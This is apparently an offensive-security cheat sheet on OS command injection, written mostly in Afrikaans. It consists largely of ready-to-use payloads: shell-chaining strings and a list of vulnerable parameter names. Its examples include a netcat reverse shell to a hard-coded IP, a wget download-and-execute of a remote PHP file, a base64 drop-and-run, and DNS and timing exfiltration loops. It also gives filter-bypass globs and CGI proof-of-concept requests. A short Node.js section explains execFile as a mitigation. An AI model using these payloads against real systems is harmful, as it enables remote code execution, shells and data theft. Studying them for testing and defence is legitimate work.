Command Injection

Reading time: 7 minutes

Wat is command Injection?

'n command injection maak die uitvoering van ewekansige bedryfstelselopdragte moontlik deur 'n aanvaller op die bediener wat 'n toepassing huisves. Gevolglik kan die toepassing en al sy data volledig gekompromiteer word. Die uitvoering van hierdie opdragte stel die aanvaller gewoonlik in staat om ongemagtigde toegang tot of beheer oor die toepassing se omgewing en die onderliggende stelsel te verkry.

Konteks

Afhangend van waar jou invoer ingespuit word mag dit nodig wees om die aangehaalde konteks te beëindig (using " or ') voor die opdragte.

Command Injection/Execution

#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id #  Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
ls%0abash%09-c%09"id"%0a   # (Combining new lines and tabs)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command

Beperkings Omseilings

As jy probeer om willekeurige opdragte in 'n linux-masjien uit te voer, sal jy belangstel om te lees oor hierdie Omseilings:

Bypass Linux Restrictions

Voorbeelde

vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay

Parameters

Hier is die top 25 parameters wat kwesbaar kan wees vir code injection en soortgelyke RCE-kwesbaarhede (van link):

?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Time based data exfiltration

Uittrekking van data: char by char

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

DNS based data exfiltration

Gebaseer op die tool van https://github.com/HoLyVieR/dnsbin, ook gehost op dnsbin.zhack.ca

1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done

$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

Aanlyn gereedskap om te kontroleer vir DNS-gebaseerde data exfiltration:

• dnsbin.zhack.ca
• pingb.in

Filtering bypass

Windows

powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc

Linux

Bypass Linux Restrictions

Node.js child_process.exec vs execFile

Wanneer jy JavaScript/TypeScript-back-ends oudit, sal jy dikwels die Node.js child_process API teëkom.

// Vulnerable: user-controlled variables interpolated inside a template string
const { exec } = require('child_process');
exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(payload)}'`, (err, stdout) => {
/* … */
});

exec() lanceer 'n shell (/bin/sh -c), daarom sal enige karakter wat 'n spesiale betekenis vir die shell het (back-ticks, ;, &&, |, $(), …) lei tot command injection wanneer gebruikersinvoer aan die string gekonkateneer word.

Mitigasie: gebruik execFile() (of spawn() sonder die shell opsie) en voorsien elke argument as 'n aparte array element sodat geen shell betrokke is nie:

const { execFile } = require('child_process');
execFile('/usr/bin/do-something', [
'--id_user', id_user,
'--payload', JSON.stringify(payload)
]);

Real-world case: Synology Photos ≤ 1.7.0-0794 was exploitable through an unauthenticated WebSocket event that placed attacker controlled data into id_user which was later embedded in an exec() call, achieving RCE (Pwn2Own Ireland 2024).

Argument/Option injection via leading hyphen (argv, no shell metacharacters)

Nie alle inspuitings vereis shell-metakarakters nie. As die toepassing onbetroubare strings as argumente aan 'n stelselutility deurgee (selfs met execve/execFile en sonder 'n shell), sal baie programme nog steeds enige argument wat met - of -- begin as 'n opsie ontleed. Dit laat 'n attacker toe om modes om te skakel, uitvoerpaaie te verander, of gevaarlike gedrag te veroorsaak sonder om ooit in 'n shell in te breek.

Tipiese plekke waar dit voorkom:

• Ingebedde web UIs/CGI-handlers wat opdragte bou soos ping <user>, tcpdump -i <iface> -w <file>, curl <url>, ens.
• Gesentraliseerde CGI-routers (bv. /cgi-bin/<something>.cgi met 'n selector-parameter soos topicurl=<handler>) waar verskeie handlers dieselfde swak validering hergebruik.

Wat om te probeer:

• Gee waardes wat begin met -/-- sodat die downstream tool dit as flags verbruik.
• Misbruik flags wat gedrag verander of lêers skryf, byvoorbeeld:
  • ping: -f/-c 100000 om die toestel te belas (DoS)
  • curl: -o /tmp/x om arbitrêre paaie te skryf, -K <url> om attacker-controlled config te laai
  • tcpdump: -G 1 -W 1 -z /path/script.sh om post-rotate uitvoering in onveilige wrappers te bereik
• As die program -- as end-of-options ondersteun, probeer om naiewe mitigasies te omseil wat -- op die verkeerde plek vooraan voeg.

Generiese PoC-skemas teen gesentraliseerde CGI-dispatchers:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded

# Flip options in a downstream tool via argv injection
topicurl=<handler>&param=-n

# Unauthenticated RCE when a handler concatenates into a shell
topicurl=setEasyMeshAgentCfg&agentName=;id;

Brute-Force Opsporingslys

Auto_Wordlists/wordlists/command_injection.txt at main \xc2\xb7 carlospolop/Auto_Wordlists \xc2\xb7 GitHub

Verwysings

• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
• https://portswigger.net/web-security/os-command-injection
• Extraction of Synology encrypted archives – Synacktiv 2025
• PHP proc_open manual
• HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)
• Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered